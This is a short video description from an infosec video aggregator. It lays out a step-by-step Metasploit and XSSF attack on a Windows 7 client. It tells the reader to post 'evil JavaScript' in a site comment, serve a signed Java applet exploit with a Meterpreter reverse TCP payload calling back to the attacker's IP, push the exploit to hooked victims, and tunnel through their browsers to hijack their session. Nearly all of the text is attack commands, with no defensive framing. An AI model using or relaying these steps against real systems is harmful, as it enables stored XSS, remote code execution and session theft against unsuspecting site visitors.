Description: Hacking to Windows 7 fully patched client using Xssf and Metasploit with injected JavaScript and java applet ,tunneling traffic to hijack user session .
1.OPEN METASPLOIT
load xss
xssf_urls
2.post in comment your evil JavaScript
3.
use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost 192.168.2.108 ( my ip address )
exploit (job in backround)
xssf_victims ( to view victims )
xssf_exploit 9 0 ( xssf_exploit [VictimIDs] [JobID] )
XSSF TUNNEL
xssf_tunnel [Victim Id]
set you proxy to 127.0.0.1:8889 and surf to superveda site in victim tunnel
PWNED :)
Music:X-Dream saiber ivoshen
Tags: xss ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.